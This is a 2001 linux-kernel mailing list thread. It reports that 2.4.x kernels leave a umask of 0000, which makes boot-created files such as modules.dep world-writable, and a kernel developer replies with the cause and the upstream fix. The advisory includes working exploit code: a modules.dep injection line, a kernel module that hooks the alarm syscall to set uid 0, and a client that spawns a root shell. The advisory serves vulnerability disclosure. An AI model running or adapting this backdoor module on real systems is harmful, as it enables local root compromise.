* umask 000 bug/difference
@ 2001-07-13 21:13 josh
2001-07-14 4:53 ` Neil Brown
0 siblings, 1 reply; 2+ messages in thread
From: josh @ 2001-07-13 21:13 UTC (permalink / raw)
To: linux-kernel
Submitted by : Josh (josh@pulltheplug.com), lockdown
(lockdown@lockeddown.net)
Vulnerability : /lib/modules/2.4.5/modules.dep
Tested On : Slackware 8.0. 2.4.5
Local : Yes
Remote : No
Temporary Fix : umask 022 at the top of all your startup scripts
Target : root
Big thanks to : slider, lamagra, zen-parse
Greets to : alpha, fr3n3tic, omega, eazyass, remmy, RedPen, banned-it,
cryptix, s0ttle, xphantom, qtip, Sultrix,
falcon-networks.com.
The 2.4.x kernels starting with 2.4.3 (i think) have, after
load, left a umask of 0000. This forces any files created in the bootup
scripts, without the command `umask 022` issued to be world writeable.
In slackware, files include /var/run/utmp and /var/run/gpm.pid. This same
vulnerability is responsible for creating /lib/modules/`uname -r`/modules.dep
world writeable. With this file world writeable, all an intruder need do is
put something like the following in /lib/modules/`uname -r`/modules.dep
assuming the system's startup scripts modprobe lp:
/lib/modules/2.4.5/kernel/drivers/char/lp.o: /tmp/alarm.o
/tmp/alarm.o:
where the alarm.o module is:
#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/types.h>
#include <asm/segment.h>
#include <asm/unistd.h>
#include <linux/dirent.h>
#include <sys/syscall.h>
#include <sys/sysmacros.h>
#include <linux/sched.h>
#include <linux/errno.h>
#include <linux/fs.h>
#include <linux/kernel.h>
extern void* sys_call_table[];
unsigned int (*old_alarm) (unsigned int seconds);
unsigned int hacked_alarm (unsigned int seconds);
unsigned int hacked_alarm(unsigned int seconds)
{
if(seconds == 454) {
current->uid = 0;
current->euid = 0;
current->gid = 0;
current->egid = 0;
return 0;
}
return old_alarm(seconds);
}
int init_module(void) {
old_alarm=sys_call_table[SYS_alarm];
sys_call_table[SYS_alarm] = hacked_alarm;
return 0;
}
void cleanup_module(void) {
sys_call_table[SYS_alarm] = old_alarm;
}
make a client:
#include <stdio.h>
#include <unistd.h>
int main(void)
{
alarm(454);
execl("/bin/sh", "sh", NULL);
}
which will, when the module is loaded, execute a shell as root.
And of course with /var/run/utmp writeable, users can delete or in
other ways manipulate their logins as they appear in
w/who/finger/getlogin(), etc.
^ permalink raw reply [flat|nested] 2+ messages in thread
* Re: umask 000 bug/difference
2001-07-13 21:13 umask 000 bug/difference josh
@ 2001-07-14 4:53 ` Neil Brown
0 siblings, 0 replies; 2+ messages in thread
From: Neil Brown @ 2001-07-14 4:53 UTC (permalink / raw)
To: josh; +Cc: linux-kernel
On Friday July 13, josh@pulltheplug.com wrote:
>
> The 2.4.x kernels starting with 2.4.3 (i think) have, after
> load, left a umask of 0000.
That was me. nfsd started to use "daemonize" so it shared the umask
(and rest of current->fs, and other stuff) with init, so we changed
the default umask to 0 as knfsd didn't want any umask getting in the
way.
It seems that someone at Redhat changed their init so that it set the
umask back to 0022, and this affected nfsd badly.
Linus has just accepted a patch which makes nfsd completely
independant of the umask setting, and sets the default umask back to
0022. You should see it in 2.4.7-pre7
For more info, look for the thread in linux-kernel with
[PATCH] Bug in NFS
in the subject.
NeilBrown
^ permalink raw reply [flat|nested] 2+ messages in thread
end of thread, other threads:[~2001-07-14 4:54 UTC | newest]
Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2001-07-13 21:13 umask 000 bug/difference josh
2001-07-14 4:53 ` Neil Brown
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox
all inboxes | Powered by JetHome®